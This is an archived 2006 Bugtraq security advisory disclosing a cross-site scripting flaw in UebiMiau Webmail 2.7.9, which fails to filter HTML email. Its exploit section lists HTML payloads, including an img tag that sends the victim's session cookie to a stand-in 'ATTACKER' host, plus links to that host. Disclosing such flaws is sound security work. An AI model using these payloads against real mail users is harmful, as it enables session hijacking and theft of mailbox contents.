lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 29 Jan 2006 17:22:12 +0200
From: "M.Neset KABAKLI" <neset@...iza.com>
To: <bugtraq@...urityfocus.com>
Subject: UebiMiau Webmail System Security Vulnerability



I.Vulnerability
UebiMiau Webmail System Cross Site Scripting Vulnerability


II.Vendor
Aldoir Ventura 


III.Affected Systems
* UebiMiau 2.7.9 (latest release) and probably previous versions.


IV.About
UebiMiau is a simple, yet efficient mail reader (webmail) supporting both
IMAP and POP3 without dependence of any PHP's extra modules or database
(http://www.uebimiau.org).


V.Description
UebiMiau does not filter HTML e-mail messages correctly, it's possible to
inject mailicious scripting codes to an e-mail. An attacker is able to
hijack a user's session and access victim's mailbox just by sending a
specially crafted e-mail message. 

This is a dangerous situation because there is no need to click a link in
some cases, client-side code executing when the user opens crafted e-mail.


VI.Exploit 
<img
src="javascript:location.href='http://ATTACKER/StealSessionData/?'+document.
cookie;" />
<img src="javascript:[XSS];" />
<a href="javascript:location.href='http://ATTACKER/StealSessionData/'">test
link 1</a>
<a href='http://ATTACKER/StealData/'>test link 2</a>


VII.Vulnerability Status
* Vulnerability discovered on 2006-01-12.
* Vendor notified on 2006-01-12.
* No response from vendor, vulnerability published on 2006-01-28.


VIII.Workarounds
* No vendor-supplied patch is currently available.


IX.Credits
M.Neset KABAKLI
Wakiza Software Technologies 
neset{at}wakiza{dot}com
www.wakiza.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ